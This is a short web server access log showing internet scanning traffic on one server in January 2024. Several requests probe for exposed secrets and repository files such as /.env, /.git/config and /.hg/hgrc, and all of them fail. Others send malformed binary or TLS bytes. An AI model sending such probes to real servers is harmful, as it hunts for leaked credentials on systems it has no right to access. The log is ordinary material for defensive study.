54.175.182.99 - - [05/Jan/2024:03:06:08 +0100] "GET /files/.git/config HTTP/1.1" 404 322 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1"
175.41.159.251 - - [05/Jan/2024:03:06:45 +0100] "GET /api/.hg/hgrc HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Linux; Android 9; COL-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
175.41.159.251 - - [05/Jan/2024:03:08:18 +0100] "GET /downloads/.git/config HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
61.219.11.155 - - [05/Jan/2024:03:08:30 +0100] "\x93\xb5M\xfa\x17K\xc4r\x18x\xa2aZ\xc3\x18\xb4\xf9]w\x8a\r\x91_\xde\x90\ra\xd7\xc6;\x96\xf3\x98\xa6Ey\x89\xe9/\b\xe68\x9fE;\xa9H\xf7\xf5\x16\xcdS-N('\b`\v\xf3A\x07\x83)\x1d\x93&V6\xe4\x8f\x17k`\tJ\xe3qX\xb9;\x86\x88\x8a\xd1\xe0\xe6-!\xb9\xbf\xb0\xb3\x89\xc8@\xeb%O&" 400 329 "-" "-"
35.203.210.8 - - [05/Jan/2024:03:14:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
45.142.182.76 - - [05/Jan/2024:03:16:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
172.208.56.239 - - [05/Jan/2024:03:24:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
172.208.56.239 - - [05/Jan/2024:03:24:05 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
172.208.56.239 - - [05/Jan/2024:03:24:06 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
198.235.24.90 - - [05/Jan/2024:03:24:25 +0100] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.90 - - [05/Jan/2024:03:24:26 +0100] "\x16\x03\x01" 501 318 "-" "-"
71.6.134.234 - - [05/Jan/2024:03:25:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
